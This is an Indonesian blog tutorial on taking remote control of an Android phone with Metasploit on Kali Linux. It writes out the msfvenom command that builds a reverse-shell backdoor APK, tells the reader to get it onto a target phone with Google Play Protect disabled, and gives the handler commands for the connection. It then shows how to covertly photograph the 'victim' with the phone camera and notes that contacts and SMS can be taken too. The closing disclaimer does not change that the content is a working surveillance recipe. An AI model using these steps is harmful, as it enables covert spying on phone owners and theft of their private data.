Hack dan Remote Android dengan Metasploit Kali Linux

Melakukan hack dan remote android dengan metasploit kali linux merupakan suatu cara untuk menguji keamanan sistem operasi android. Metasploit dapat mengetahui informasi yang tersimpan pada perangkat, bahkan data seperti kontak, sms, video, foto, dan lain-lain dapat dengan mudah diambil tanpa sepengatahuan pemilik.

Metasploit berjalan pada sistem operasi linux. Jika anda pengguna Kali Linux anda tidak perlu menginstall tools ini lagi, karena secara default sudah tersedia pada menu Kali Linux. Terdapat banyak sekali tools penetrasi testing pada Kali Linux, tersedia 300 lebih software yang dapat anda gunakan. Sehingga tidak heran jika sistem operasi ini banyak digunakan oleh hacker.

Sebelum melakukan hack android menggunakan metasploit, sebaiknya anda mengetahui apa itu metasploit, dan berikut penjelasannya.

Apa itu Metasploit?

Metasploit merupakan suatu proyek keamanan komputer untuk melakukan pengujian keamanan terhadap sebuah sistem, yang dapat menampilkan informasi kerentanan dan pengembangan signature IDS. Metasploit ialah sebuah software keamanan yang digunakan untuk mengeksploitasi suatu sistem dengan menguji coba ketahanan sistem tersebut.

Rapid7 merupakan suatu perusahaan yang mengembangkan The Metasploit Project. Proyek ini mengembangkan source code yang memungkinkan untuk masuk ke jaringan sendiri dan mengindentifikasi resiko keamanan terhadap jaringan tersebut. Serta menyediakan informasi kerentanan suatu keamanan komputer.

Install Kali Linux

Kali Linux merupakan sistem operasi berbasis debian yang dikembangkan oleh Offensive Security. Sistem operasi ini merupakan reinkarnasi dari Backtrack, yang lebih dahulu digunakan sebagai penguji terhadap keamanan komputer. Backtrack versi 6 merupakan versi terakhir sebelum yang kemudian berganti menjadi Kali Linux.

Kali Linux dikembangkan secara open source dan di danai oleh Offensive Security, serta dapat digunakan secara gratis. Terdapat lebih dari 300 tools yang dapat digunakan untuk penetrasi testing. User interface Kali Linux terlihat sederhana, sehingga orang yang baru memulai menggunakan OS ini akan mudah menjalankannya.

Menginstall sistem operasi Kali Linux untuk keperluan penetrasi testing android menggunakan metasploit harus anda lakukan. Terutama jika anda belum menginstall linux pada komputer. Anda dapat menginstall distro linux apa saja seperti linux mint, ubuntu, arch dll. Namun jika menggunakan distro selain Kali Linux, anda harus menginstall Metasploit secara manual.

Cara Hack dan Remote Android dengan Metasploit Kali Linux

Setelah menginstall metasploit pada linux, selanjutnya anda dapat melakukan penetrasi testing dengan melakukan hack dan remote android. Metasploit akan mengekspolitasi android dari jarak jauh melalui jaringan. Dan berikut langkah-langkahnya.

Menjalankan Metasploit

• Hubungkan komputer anda ke jaringan LAN atau WIFI.
• Buka Terminal. Kemudian melakukan pengecekan IP Address dengan cara mengetikkan ‘ifconfig‘, lalu enter. Maka akan terlihat IP Address yang anda gunakan saat ini.

• Salin IP Address komputer anda.
• Generate APK Android. Caranya ialah buka Terminal baru, kemudian ketikan sintaks berikut pada terminal. Dan ganti LHOST dengan IP Address komputer anda.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 R> backdoor.apk

• Ketik enter dan tunggu proses generate apk android selesai.
• Dan terlihat aplikasi android bernama backdoor.apk yang berada pada folder home Kali Linux.

• Pindahkan backdoor.apk ke android yang ingin menjadi target.
• Kemudian install aplikasi tersebut. Dan pastikan anda telah mematikan Google Play Protect pada android.
• Kembali ke Terminal Linux, dan ketikan kode berikut lalu tekan enter untuk mengeksekusi kode.

service postgresql start

• Jalankan Msfconsole dengan cara mengetikan perintah berikut pada Terminal.

msfconsole

• Tekan enter untuk menjalankan. Dan terlihat msfconsole berhasil berjalan.

• Jalankan aplikasi backdoor.apk yang telah terinstall pada android.

Melakukan Eksploitasi Android

• Kembali ke Terminal linux, kemudian ketikan sintaks berikut.

use exploit/multi/handler

• Melakukan pengaturan Payload dengan cara mengetikan sintaks berikut ke Terminal.

set payload android/meterpreter/reverse_tcp

• Kemudian set Localhost, dan ganti IP Address sesuai dengan IP komputer anda. Contoh: set LHOST 192.168.0.104.

set LHOST IP Address Anda

• Set LPORT. Gunakan angkat apa saja yang penting empat angka. Sebagai contoh saya menggunakan LPORT 4444.

set LPORT 4444

• Kemudian lakukan exploitasi dengan mengetikan exploit, lalu enter.

Melakukan Remote Android

• Melihat informasi Android yang sedang korban gunakan saat ini. Caranya dengan mengetikkan sysinfo pada terminal, kemudian tekan enter.

• Melihat perintah dasar msfconsole anda dapat mengetikan tanda tanya (?).

• Untuk melihat daftar kamera android, caranya ialah dengan mengetikan webcam_list.
• Selanjutnya ialah kita akan mengambil foto secara diam-diam menggunakan msfconsole tanpa disadari oleh pengguna android. Caranya dengan mengetikan webcam_snap, dan secara tidak sadar, kamera akan mengambil foto dengan berjalan pada background android.

Akhir Kata

Itulah cara hack dan remote android dengan metasploit kali linux. Anda dapat melakukan lebih banyak lagi dengan msfconsole, seperti mendapatkan kontak, sms, email, dan lain-lain.

Sebagai catatan gunakan cara ini dengan bijak, jangan buat untuk merugikan orang lain. Saya bagikan pada artikel ini hanya sebagai pembelajaran, segala resiko menjadi tanggung jawab anda. Dan sekian dulu dari saya, apabila ada yang ingin anda tanyakan, dapa menuliskan pada kolom komentar. Terima kasih.